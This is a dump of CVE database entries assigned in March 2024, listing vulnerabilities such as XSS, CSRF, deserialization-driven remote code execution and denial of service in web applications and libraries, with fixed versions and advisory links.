CVE 2024 2889 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Lab WP-Lister Lite for Amazon allows Stored XSS.This issue affects WP-Lister Lite for Amazon: from n/a through 2.6.11. MISC:https://patchstack.com/database/vulnerability/wp-lister-for-amazon/wordpress-wp-lister-lite-for-amazon-plugin-2-6-11-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-lister-for-amazon/wordpress-wp-lister-lite-for-amazon-plugin-2-6-11-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240326)
CVE 2024 2888 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BoldGrid Post and Page Builder by BoldGrid – Visual Drag and Drop Editor allows Stored XSS.This issue affects Post and Page Builder by BoldGrid – Visual Drag and Drop Editor: from n/a through 1.26.2. MISC:https://patchstack.com/database/vulnerability/post-and-page-builder/wordpress-post-and-page-builder-by-boldgrid-plugin-1-26-2-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/post-and-page-builder/wordpress-post-and-page-builder-by-boldgrid-plugin-1-26-2-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240326)
CVE 2024 28868 Candidate Umbraco is an ASP.NET content management system. Umbraco 10 prior to 10.8.4 with access to the native login screen is vulnerable to a possible user enumeration attack. This issue was fixed in version 10.8.5. As a workaround, one may disable the native login screen by exclusively using external logins. MISC:https://github.com/umbraco/Umbraco-CMS/commit/7e1d1a1968000226cd882fff078b122b8d46c44d | URL:https://github.com/umbraco/Umbraco-CMS/commit/7e1d1a1968000226cd882fff078b122b8d46c44d | MISC:https://github.com/umbraco/Umbraco-CMS/security/advisories/GHSA-552f-97wf-pmpq | URL:https://github.com/umbraco/Umbraco-CMS/security/advisories/GHSA-552f-97wf-pmpq Assigned (20240311)
CVE 2024 28865 Candidate django-wiki is a wiki system for Django. Installations of django-wiki prior to version 0.10.1 are vulnerable to maliciously crafted article content that can cause severe use of server CPU through a regular expression loop. Version 0.10.1 fixes this issue. As a workaround, close off access to create and edit articles by anonymous users. MISC:https://github.com/django-wiki/django-wiki/commit/8e280fd6c0bd27ce847c67b2d216c6cbf920f88c | URL:https://github.com/django-wiki/django-wiki/commit/8e280fd6c0bd27ce847c67b2d216c6cbf920f88c | MISC:https://github.com/django-wiki/django-wiki/security/advisories/GHSA-wj85-w4f4-xh8h | URL:https://github.com/django-wiki/django-wiki/security/advisories/GHSA-wj85-w4f4-xh8h Assigned (20240311)
CVE 2024 28864 Candidate SecureProps is a PHP library designed to simplify the encryption and decryption of property data in objects. A vulnerability in SecureProps version 1.2.0 and 1.2.1 involves a regex failing to detect tags during decryption of encrypted data. This occurs when the encrypted data has been encoded with `NullEncoder` and passed to `TagAwareCipher`, and contains special characters such as `\n`. As a result, the decryption process is skipped since the tags are not detected. This causes the encrypted data to be returned in plain format. The vulnerability affects users who implement `TagAwareCipher` with any base cipher that has `NullEncoder` (not default). The patch for the issue has been released. Users are advised to update to version 1.2.2. As a workaround, one may use the default `Base64Encoder` with the base cipher decorated with `TagAwareCipher` to prevent special characters in the encrypted string from interfering with regex tag detection logic. This workaround is safe but may involve double encoding since `TagAwareCipher` uses `NullEncoder` by default. MISC:https://github.com/IlicMiljan/Secure-Props/commit/ab7b561040cd37fda3dbf9a6cab01fefcaa16627 | URL:https://github.com/IlicMiljan/Secure-Props/commit/ab7b561040cd37fda3dbf9a6cab01fefcaa16627 | MISC:https://github.com/IlicMiljan/Secure-Props/issues/20 | URL:https://github.com/IlicMiljan/Secure-Props/issues/20 | MISC:https://github.com/IlicMiljan/Secure-Props/pull/21 | URL:https://github.com/IlicMiljan/Secure-Props/pull/21 | MISC:https://github.com/IlicMiljan/Secure-Props/security/advisories/GHSA-rj29-j2g4-77q8 | URL:https://github.com/IlicMiljan/Secure-Props/security/advisories/GHSA-rj29-j2g4-77q8 Assigned (20240311)
CVE 2024 28863 Candidate node-tar is a Tar for Node.js. node-tar prior to version 6.2.1 has no limit on the number of sub-folders created in the folder creation process. An attacker who generates a large number of sub-folders can consume memory on the system running node-tar and even crash the Node.js client within few seconds of running it using a path with too many sub-folders inside. Version 6.2.1 fixes this issue by preventing extraction in excessively deep sub-folders. MISC:https://github.com/isaacs/node-tar/commit/fe8cd57da5686f8695415414bda49206a545f7f7 | URL:https://github.com/isaacs/node-tar/commit/fe8cd57da5686f8695415414bda49206a545f7f7 | MISC:https://github.com/isaacs/node-tar/security/advisories/GHSA-f5x3-32g6-xq36 | URL:https://github.com/isaacs/node-tar/security/advisories/GHSA-f5x3-32g6-xq36 Assigned (20240311)
CVE 2024 28862 Candidate The Ruby One Time Password library (ROTP) is an open source library for generating and validating one time passwords. Affected versions had overly permissive default permissions. Users should patch to version 6.3.0. Users unable to patch may correct file permissions after installation. MISC:https://github.com/mdp/rotp/security/advisories/GHSA-x2h8-qmj4-g62f | URL:https://github.com/mdp/rotp/security/advisories/GHSA-x2h8-qmj4-g62f Assigned (20240311)
CVE 2024 28861 Candidate Symfony 1 is a community-driven fork of the 1.x branch of Symfony, a PHP framework for web projects. Starting in version 1.1.0 and prior to version 1.5.19, Symfony 1 has a gadget chain due to dangerous deserialization in `sfNamespacedParameterHolder` class that would enable an attacker to get remote code execution if a developer deserializes user input in their project. Version 1.5.19 contains a patch for the issue. MISC:https://github.com/FriendsOfSymfony1/symfony1/commit/0bd9d59c69221f49bfc8be8b871b79e12d7d171a | URL:https://github.com/FriendsOfSymfony1/symfony1/commit/0bd9d59c69221f49bfc8be8b871b79e12d7d171a | MISC:https://github.com/FriendsOfSymfony1/symfony1/security/advisories/GHSA-pv9j-c53q-h433 | URL:https://github.com/FriendsOfSymfony1/symfony1/security/advisories/GHSA-pv9j-c53q-h433 Assigned (20240311)
CVE 2024 28859 Candidate Symfony1 is a community fork of symfony 1.4 with DIC, form enhancements, latest Swiftmailer, better performance, composer compatible and PHP 8 support. Symfony 1 has a gadget chain due to vulnerable Swift Mailer dependency that would enable an attacker to get remote code execution if a developer unserialize user input in his project. This vulnerability present no direct threat but is a vector that will enable remote code execution if a developper deserialize user untrusted data. Symfony 1 depends on Swift Mailer which is bundled by default in vendor directory in the default installation since 1.3.0. Swift Mailer classes implement some `__destruct()` methods. These methods are called when php destroys the object in memory. However, it is possible to include any object type in `$this->_keys` to make PHP access to another array/object properties than intended by the developer. In particular, it is possible to abuse the array access which is triggered on foreach($this->_keys ...) for any class implementing ArrayAccess interface. This may allow an attacker to execute any PHP command which leads to remote code execution. This issue has been addressed in version 1.5.18. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/FriendsOfSymfony1/symfony1/commit/edb850f94fb4de18ca53d0d1824910d6e8130166 | URL:https://github.com/FriendsOfSymfony1/symfony1/commit/edb850f94fb4de18ca53d0d1824910d6e8130166 | MISC:https://github.com/FriendsOfSymfony1/symfony1/security/advisories/GHSA-wjv8-pxr6-5f4r | URL:https://github.com/FriendsOfSymfony1/symfony1/security/advisories/GHSA-wjv8-pxr6-5f4r Assigned (20240311)
CVE 2024 28855 Candidate ZITADEL, open source authentication management software, uses Go templates to render the login UI. Due to a improper use of the `text/template` instead of the `html/template` package, the Login UI did not sanitize input parameters prior to versions 2.47.3, 2.46.1, 2.45.1, 2.44.3, 2.43.9, 2.42.15, and 2.41.15. An attacker could create a malicious link, where he injected code which would be rendered as part of the login screen. While it was possible to inject HTML including JavaScript, the execution of such scripts would be prevented by the Content Security Policy. Versions 2.47.3, 2.46.1, 2.45.1, 2.44.3, 2.43.9, 2.42.15, and 2.41.15 contain a patch for this issue. No known workarounds are available. MISC:https://github.com/zitadel/zitadel/releases/tag/v2.41.15 | URL:https://github.com/zitadel/zitadel/releases/tag/v2.41.15 | MISC:https://github.com/zitadel/zitadel/releases/tag/v2.42.15 | URL:https://github.com/zitadel/zitadel/releases/tag/v2.42.15 | MISC:https://github.com/zitadel/zitadel/releases/tag/v2.43.9 | URL:https://github.com/zitadel/zitadel/releases/tag/v2.43.9 | MISC:https://github.com/zitadel/zitadel/releases/tag/v2.44.3 | URL:https://github.com/zitadel/zitadel/releases/tag/v2.44.3 | MISC:https://github.com/zitadel/zitadel/releases/tag/v2.45.1 | URL:https://github.com/zitadel/zitadel/releases/tag/v2.45.1 | MISC:https://github.com/zitadel/zitadel/releases/tag/v2.46.1 | URL:https://github.com/zitadel/zitadel/releases/tag/v2.46.1 | MISC:https://github.com/zitadel/zitadel/releases/tag/v2.47.3 | URL:https://github.com/zitadel/zitadel/releases/tag/v2.47.3 | MISC:https://github.com/zitadel/zitadel/security/advisories/GHSA-hfrg-4jwr-jfpj | URL:https://github.com/zitadel/zitadel/security/advisories/GHSA-hfrg-4jwr-jfpj Assigned (20240311)
CVE 2024 28854 Candidate tls-listener is a rust lang wrapper around a connection listener to support TLS. With the default configuration of tls-listener, a malicious user can open 6.4 `TcpStream`s a second, sending 0 bytes, and can trigger a DoS. The default configuration options make any public service using `TlsListener::new()` vulnerable to a slow-loris DoS attack. This impacts any publicly accessible service using the default configuration of tls-listener in versions prior to 0.10.0. Users are advised to upgrade. Users unable to upgrade may mitigate this by passing a large value, such as `usize::MAX` as the parameter to `Builder::max_handshakes`. MISC:https://en.wikipedia.org/wiki/Slowloris_(computer_security) | URL:https://en.wikipedia.org/wiki/Slowloris_(computer_security) | MISC:https://github.com/tmccombs/tls-listener/commit/d5a7655d6ea9e53ab57c3013092c5576da964bc4 | URL:https://github.com/tmccombs/tls-listener/commit/d5a7655d6ea9e53ab57c3013092c5576da964bc4 | MISC:https://github.com/tmccombs/tls-listener/security/advisories/GHSA-2qph-qpvm-2qf7 | URL:https://github.com/tmccombs/tls-listener/security/advisories/GHSA-2qph-qpvm-2qf7 Assigned (20240311)
CVE 2024 28851 Candidate The Snowflake Hive metastore connector provides an easy way to query Hive-managed data via Snowflake. Snowflake Hive MetaStore Connector has addressed a potential elevation of privilege vulnerability in a `helper script` for the Hive MetaStore Connector. A malicious insider without admin privileges could, in theory, use the script to download content from a Microsoft domain to the local system and replace the valid content with malicious code. If the attacker then also had local access to the same system where the maliciously modified script is run, they could attempt to manipulate users into executing the attacker-controlled helper script, potentially gaining elevated privileges to the local system. The vulnerability in the script was patched on February 09, 2024, without a version bump to the Connector. User who use the helper script are strongly advised to use the latest version as soon as possible. Users unable to upgrade should avoid using the helper script. MISC:https://github.com/snowflakedb/snowflake-hive-metastore-connector/blob/master/scripts/add_snowflake_hive_metastore_connector_script_action.sh | URL:https://github.com/snowflakedb/snowflake-hive-metastore-connector/blob/master/scripts/add_snowflake_hive_metastore_connector_script_action.sh | MISC:https://github.com/snowflakedb/snowflake-hive-metastore-connector/commit/dfbf87dff456f6bb62c927711d97316f0c71d8ca | URL:https://github.com/snowflakedb/snowflake-hive-metastore-connector/commit/dfbf87dff456f6bb62c927711d97316f0c71d8ca | MISC:https://github.com/snowflakedb/snowflake-hive-metastore-connector/security/advisories/GHSA-r68p-g2x9-mq7x | URL:https://github.com/snowflakedb/snowflake-hive-metastore-connector/security/advisories/GHSA-r68p-g2x9-mq7x Assigned (20240311)
CVE 2024 28850 Candidate WP Crontrol controls the cron events on WordPress websites. WP Crontrol includes a feature that allows administrative users to create events in the WP-Cron system that store and execute PHP code subject to the restrictive security permissions documented here. While there is no known vulnerability in this feature on its own, there exists potential for this feature to be vulnerable to RCE if it were specifically targeted via vulnerability chaining that exploited a separate SQLi (or similar) vulnerability. This is exploitable on a site if one of the below preconditions are met, the site is vulnerable to a writeable SQLi vulnerability in any plugin, theme, or WordPress core, the site's database is compromised at the hosting level, the site is vulnerable to a method of updating arbitrary options in the wp_options table, or the site is vulnerable to a method of triggering an arbitrary action, filter, or function with control of the parameters. As a hardening measure, WP Crontrol version 1.16.2 ships with a new feature that prevents tampering of the code stored in a PHP cron event. MISC:https://github.com/johnbillion/wp-crontrol/releases/tag/1.16.2 | URL:https://github.com/johnbillion/wp-crontrol/releases/tag/1.16.2 | MISC:https://github.com/johnbillion/wp-crontrol/security/advisories/GHSA-9xvf-cjvf-ff5q | URL:https://github.com/johnbillion/wp-crontrol/security/advisories/GHSA-9xvf-cjvf-ff5q Assigned (20240311)
CVE 2024 28849 Candidate follow-redirects is an open source, drop-in replacement for Node's `http` and `https` modules that automatically follows redirects. In affected versions follow-redirects only clears authorization header during cross-domain redirect, but keep the proxy-authentication header which contains credentials too. This vulnerability may lead to credentials leak, but has been addressed in version 1.15.6. Users are advised to upgrade. There are no known workarounds for this vulnerability. FEDORA:FEDORA-2024-db558f6fb2 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOIF4EPQUCKDBEVTGRQDZ3CGTYQHPO7Z/ | MISC:https://fetch.spec.whatwg.org/#authentication-entries | URL:https://fetch.spec.whatwg.org/#authentication-entries | MISC:https://github.com/follow-redirects/follow-redirects/commit/c4f847f85176991f95ab9c88af63b1294de8649b | URL:https://github.com/follow-redirects/follow-redirects/commit/c4f847f85176991f95ab9c88af63b1294de8649b | MISC:https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-cxjh-pqwp-8mfp | URL:https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-cxjh-pqwp-8mfp | MISC:https://github.com/psf/requests/issues/1885 | URL:https://github.com/psf/requests/issues/1885 | MISC:https://hackerone.com/reports/2390009 | URL:https://hackerone.com/reports/2390009 Assigned (20240311)
CVE 2024 28848 Candidate OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. The `CompiledRule::validateExpression` method evaluates an SpEL expression using an `StandardEvaluationContext`, allowing the expression to reach and interact with Java classes such as `java.lang.Runtime`, leading to Remote Code Execution. The `/api/v1/policies/validation/condition/<expression>` endpoint passes user-controlled data `CompiledRule::validateExpession` allowing authenticated (non-admin) users to execute arbitrary system commands on the underlaying operating system. In addition, there is a missing authorization check since `Authorizer.authorize()` is never called in the affected path and therefore any authenticated non-admin user is able to trigger this endpoint and evaluate arbitrary SpEL expressions leading to arbitrary command execution. This vulnerability was discovered with the help of CodeQL's Expression language injection (Spring) query and is also tracked as `GHSL-2023-236`. This issue may lead to Remote Code Execution and has been resolved in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection | URL:https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection | MISC:https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/security/policyevaluator/CompiledRule.java#L51 | URL:https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/security/policyevaluator/CompiledRule.java#L51 | MISC:https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/security/policyevaluator/CompiledRule.java#L57 | URL:https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/security/policyevaluator/CompiledRule.java#L57 | MISC:https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-5xv3-fm7g-865r | URL:https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-5xv3-fm7g-865r Assigned (20240311)
CVE 2024 28847 Candidate OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. Similarly to the GHSL-2023-250 issue, `AlertUtil::validateExpression` is also called from `EventSubscriptionRepository.prepare()`, which can lead to Remote Code Execution. `prepare()` is called from `EntityRepository.prepareInternal()` which, in turn, gets called from `EntityResource.createOrUpdate()`. Note that, even though there is an authorization check (`authorizer.authorize()`), it gets called after `prepareInternal()` gets called and, therefore, after the SpEL expression has been evaluated. In order to reach this method, an attacker can send a PUT request to `/api/v1/events/subscriptions` which gets handled by `EventSubscriptionResource.createOrUpdateEventSubscription()`. This vulnerability was discovered with the help of CodeQL's Expression language injection (Spring) query. This issue may lead to Remote Code Execution and has been addressed in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as `GHSL-2023-251`. MISC:https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection | URL:https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection | MISC:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EntityRepository.java#L693 | URL:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EntityRepository.java#L693 | MISC:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EventSubscriptionRepository.java#L69-L83 | URL:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EventSubscriptionRepository.java#L69-L83 | MISC:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/EntityResource.java#L219 | URL:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/EntityResource.java#L219 | MISC:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/events/subscription/EventSubscriptionResource.java#L289 | URL:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/events/subscription/EventSubscriptionResource.java#L289 | MISC:https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-8p5r-6mvv-2435 | URL:https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-8p5r-6mvv-2435 Assigned (20240311)
CVE 2024 28835 Candidate A flaw has been discovered in GnuTLS where an application crash can be induced when attempting to verify a specially crafted .pem bundle using the "certtool --verify-chain" command. MISC:RHBZ#2269084 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2269084 | MISC:https://access.redhat.com/security/cve/CVE-2024-28835 | URL:https://access.redhat.com/security/cve/CVE-2024-28835 | MISC:https://lists.gnupg.org/pipermail/gnutls-help/2024-March/004845.html | URL:https://lists.gnupg.org/pipermail/gnutls-help/2024-March/004845.html Assigned (20240311)
CVE 2024 28834 Candidate A flaw was found in GnuTLS. The Minerva attack is a cryptographic vulnerability that exploits deterministic behavior in systems like GnuTLS, leading to side-channel leaks. In specific scenarios, such as when using the GNUTLS_PRIVKEY_FLAG_REPRODUCIBLE flag, it can result in a noticeable step in nonce size from 513 to 512 bits, exposing a potential timing side-channel. MISC:RHBZ#2269228 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2269228 | MISC:https://access.redhat.com/security/cve/CVE-2024-28834 | URL:https://access.redhat.com/security/cve/CVE-2024-28834 | MISC:https://lists.gnupg.org/pipermail/gnutls-help/2024-March/004845.html | URL:https://lists.gnupg.org/pipermail/gnutls-help/2024-March/004845.html | MISC:https://people.redhat.com/~hkario/marvin/ | URL:https://people.redhat.com/~hkario/marvin/ Assigned (20240311)
CVE 2024 28824 Candidate Least privilege violation and reliance on untrusted inputs in the mk_informix Checkmk agent plugin before Checkmk 2.3.0b4 (beta), 2.2.0p24, 2.1.0p41 and 2.0.0 (EOL) allows local users to escalate privileges. MISC:https://checkmk.com/werk/16198 | URL:https://checkmk.com/werk/16198 Assigned (20240311)
CVE 2024 28823 Candidate Amazon AWS aws-js-s3-explorer (aka AWS JavaScript S3 Explorer) 1.0.0 allows XSS via a crafted S3 bucket name to index.html. MISC:https://github.com/awslabs/aws-js-s3-explorer/commit/f62f12960d081895960d0dc6fde8364f25d651b6 | MISC:https://github.com/awslabs/aws-js-s3-explorer/issues/118 Assigned (20240311)
CVE 2024 28816 Candidate Student Information Chatbot a0196ab allows SQL injection via the username to the login function in index.php. MISC:https://github.com/AaravRajSIngh/Chatbot/pull/10 Assigned (20240311)
CVE 2024 28757 Candidate libexpat through 2.6.1 allows an XML Entity Expansion attack when there is isolated use of external parsers (created via XML_ExternalEntityParserCreate). CONFIRM:https://security.netapp.com/advisory/ntap-20240322-0001/ | FEDORA:FEDORA-2024-40b98c9ced | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKJ7V5F6LJCEQJXDBWGT27J7NAP3E3N7/ | FEDORA:FEDORA-2024-4e6e660fae | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FPLC6WDSRDUYS7F7JWAOVOHFNOUQ43DD/ | FEDORA:FEDORA-2024-afb73e6f62 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VK2O34GH43NTHBZBN7G5Y6YKJKPUCTBE/ | MISC:https://github.com/libexpat/libexpat/issues/839 | MISC:https://github.com/libexpat/libexpat/pull/842 Assigned (20240310)
CVE 2024 28756 Candidate The SolarEdge mySolarEdge application before 2.20.1 for Android has a certificate verification issue that allows a Machine-in-the-middle (MitM) attacker to read and alter all network traffic between the application and the server. MISC:https://www.solaredge.com/coordinated-vulnerability-disclosure-policy/advisories/sedg-2024-1 | MISC:https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-012.txt Assigned (20240310)
CVE 2024 28754 Candidate RaspAP (aka raspap-webgui) through 3.0.9 allows remote attackers to cause a persistent denial of service (bricking) via a crafted request. MISC:https://dustri.org/b/carrot-disclosure.html Assigned (20240308)
CVE 2024 28753 Candidate RaspAP (aka raspap-webgui) through 3.0.9 allows remote attackers to read the /etc/passwd file via a crafted request. MISC:https://dustri.org/b/carrot-disclosure.html Assigned (20240308)
CVE 2024 28752 Candidate A SSRF vulnerability using the Aegis DataBinding in versions of Apache CXF before 4.0.4, 3.6.3 and 3.5.8 allows an attacker to perform SSRF style attacks on webservices that take at least one parameter of any type. Users of other data bindings (including the default databinding) are not impacted. MISC:https://cxf.apache.org/security-advisories.data/CVE-2024-28752.txt | URL:https://cxf.apache.org/security-advisories.data/CVE-2024-28752.txt Assigned (20240308)
CVE 2024 28746 Candidate Apache Airflow, versions 2.8.0 through 2.8.2, has a vulnerability that allows an authenticated user with limited permissions to access resources such as variables, connections, etc from the UI which they do not have permission to access. Users of Apache Airflow are recommended to upgrade to version 2.8.3 or newer to mitigate the risk associated with this vulnerability MISC:https://github.com/apache/airflow/pull/37881 | URL:https://github.com/apache/airflow/pull/37881 | MISC:https://lists.apache.org/thread/b4pffc7w7do6qgk4jjbyxvdz5odrvny7 | URL:https://lists.apache.org/thread/b4pffc7w7do6qgk4jjbyxvdz5odrvny7 Assigned (20240308)
CVE 2024 28745 Candidate Improper export of Android application components issue exists in 'ABEMA' App for Android prior to 10.65.0 allowing another app installed on the user's device to access an arbitrary URL on 'ABEMA' App for Android via Intent. If this vulnerability is exploited, an arbitrary website may be displayed on the app, and as a result, the user may become a victim of a phishing attack. MISC:https://jvn.jp/en/jp/JVN70640802/ | URL:https://jvn.jp/en/jp/JVN70640802/ Assigned (20240308)
CVE 2024 28735 Candidate An incorrect access control issue in Unit4 Financials by Coda v.2023Q4 allows a remote attacker to escalate privileges via a crafted script to the change password function. MISC:http://financials.com | MISC:http://unit4.com | MISC:https://packetstormsecurity.com/files/177620/Financials-By-Coda-Authorization-Bypass.html Assigned (20240308)
CVE 2024 28734 Candidate Cross Site Scripting vulnerability in Unit4 Financials by Coda v.2024Q1 allows a remote attacker to escalate privileges via a crafted script to the cols parameter. MISC:http://financials.com | MISC:http://unit4.com | MISC:https://packetstormsecurity.com/files/177619/Financials-By-Coda-Cross-Site-Scripting.html Assigned (20240308)
CVE 2024 2873 Candidate A vulnerability was found in wolfSSH's server-side state machine before versions 1.4.17. A malicious client could create channels without first performing user authentication, resulting in unauthorized access. MISC:https://github.com/wolfSSL/wolfssh/pull/670 | URL:https://github.com/wolfSSL/wolfssh/pull/670 | MISC:https://github.com/wolfSSL/wolfssh/pull/671 | URL:https://github.com/wolfSSL/wolfssh/pull/671 | MISC:https://www.wolfssl.com/docs/security-vulnerabilities/ | URL:https://www.wolfssl.com/docs/security-vulnerabilities/ Assigned (20240325)
CVE 2024 28715 Candidate Cross Site Scripting vulnerability in DOraCMS v.2.18 and before allows a remote attacker to execute arbitrary code via the markdown0 function in the /app/public/apidoc/oas3/wrap-components/markdown.jsx endpoint. MISC:https://github.com/Lq0ne/CVE-2024-28715 Assigned (20240308)
CVE 2024 28684 Candidate DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/module_main.php MISC:https://github.com/777erp/cms/blob/main/16.md Assigned (20240308)
CVE 2024 28683 Candidate DedeCMS v5.7 was discovered to contain a cross-site scripting (XSS) vulnerability via create file. MISC:https://github.com/777erp/cms/blob/main/20.md Assigned (20240308)
CVE 2024 28682 Candidate DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/sys_cache_up.php. MISC:https://github.com/777erp/cms/blob/main/13.md Assigned (20240308)
CVE 2024 28681 Candidate DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/plus_edit.php. MISC:https://github.com/777erp/cms/blob/main/17.md Assigned (20240308)
CVE 2024 28680 Candidate DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/diy_add.php. MISC:https://github.com/777erp/cms/blob/main/11.md Assigned (20240308)
CVE 2024 28679 Candidate DedeCMS v5.7 was discovered to contain a cross-site scripting (XSS) vulnerability via Photo Collection. MISC:https://github.com/777erp/cms/blob/main/19.md Assigned (20240308)
CVE 2024 28678 Candidate DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/article_description_main.php MISC:https://github.com/777erp/cms/blob/main/15.md Assigned (20240308)
CVE 2024 28677 Candidate DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/article_keywords_main.php. MISC:https://github.com/777erp/cms/blob/main/14.md Assigned (20240308)
CVE 2024 28676 Candidate DedeCMS v5.7 was discovered to contain a cross-site scripting (XSS) vulnerability via /dede/article_edit.php. MISC:https://github.com/777erp/cms/blob/main/18.md Assigned (20240308)
CVE 2024 28675 Candidate DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/diy_edit.php MISC:https://github.com/777erp/cms/blob/main/12.md Assigned (20240308)
CVE 2024 28673 Candidate DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/mychannel_edit.php. MISC:https://github.com/777erp/cms/blob/main/4.md Assigned (20240308)
CVE 2024 28672 Candidate DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/media_edit.php. MISC:https://github.com/777erp/cms/blob/main/3.md Assigned (20240308)
CVE 2024 28671 Candidate DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/stepselect_main.php. MISC:https://github.com/777erp/cms/blob/main/7.md Assigned (20240308)
CVE 2024 28670 Candidate DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/freelist_main.php. MISC:https://github.com/777erp/cms/blob/main/9.md Assigned (20240308)
CVE 2024 28669 Candidate DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/freelist_edit.php. MISC:https://github.com/777erp/cms/blob/main/10.md Assigned (20240308)
CVE 2024 28668 Candidate DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/mychannel_add.php MISC:https://github.com/777erp/cms/blob/main/5.md Assigned (20240308)
CVE 2024 28667 Candidate DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/templets_one_edit.php MISC:https://github.com/777erp/cms/blob/main/6.md Assigned (20240308)
CVE 2024 28666 Candidate DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/media_add.php MISC:https://github.com/777erp/cms/blob/main/2.md Assigned (20240308)
CVE 2024 28665 Candidate DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/article_add.php MISC:https://github.com/777erp/cms/blob/main/1.md Assigned (20240308)
CVE 2024 28662 Candidate A Cross Site Scripting vulnerability exists in Piwigo before 14.3.0 script because of missing sanitization in create_tag in admin/include/functions.php. CONFIRM:https://github.com/Piwigo/Piwigo/compare/14.2.0...14.3.0 | MISC:https://github.com/Piwigo/Piwigo/commit/5069610aaeb1da6d96d389651a5ba9b38690c580 | MISC:https://github.com/Piwigo/Piwigo/security/advisories/GHSA-8g2g-6f2c-6h7j Assigned (20240308)
CVE 2024 2865 Candidate Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mergen Software Quality Management System allows SQL Injection.This issue affects Quality Management System: through 25032024. MISC:https://www.usom.gov.tr/bildirim/tr-24-0229 | URL:https://www.usom.gov.tr/bildirim/tr-24-0229 Assigned (20240325)
CVE 2024 28640 Candidate Buffer Overflow vulnerability in TOTOLink X5000R V9.1.0u.6118-B20201102 and A7000R V9.1.0u.6115-B20201022 allows a remote attacker to cause a denial of service (D0S) via the command field. MISC:https://github.com/ZIKH26/CVE-information/blob/master/TOTOLINK/Vulnerability%20Information_2.md Assigned (20240308)
